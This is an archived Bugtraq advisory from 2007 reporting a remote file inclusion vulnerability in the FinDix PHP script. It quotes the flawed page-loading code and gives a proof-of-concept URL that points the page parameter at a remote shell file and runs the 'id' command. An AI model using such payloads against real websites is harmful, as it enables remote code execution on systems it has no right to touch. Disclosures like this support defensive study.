[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070809134139.3172.qmail@securityfocus.com>
Date: 9 Aug 2007 13:41:39 -0000
From: rizgar@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: FinDix Remote File Inclusion Vulnerability
FinDix Remote File Inclusion Vulnerability
-----------------------------------------------------------------------
Script : FinDix
Site : http://ctw-design.com/styldiv/FindNix.zip
Founder : Rizgar
Contact : rizgar@...uxmail.org
Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :]
-----------------------------------------------------------------------
Okey now in the script found bug :
Line : 34-35
/*
* load page in content table
*/
if ($page == "")
$page = "start.htm"; //* change to your start page content.
/*
PoC :
http://www.site.com/findix/index.php?page=http://shell.txt?&cmd=id
Powered by blists - more mailing lists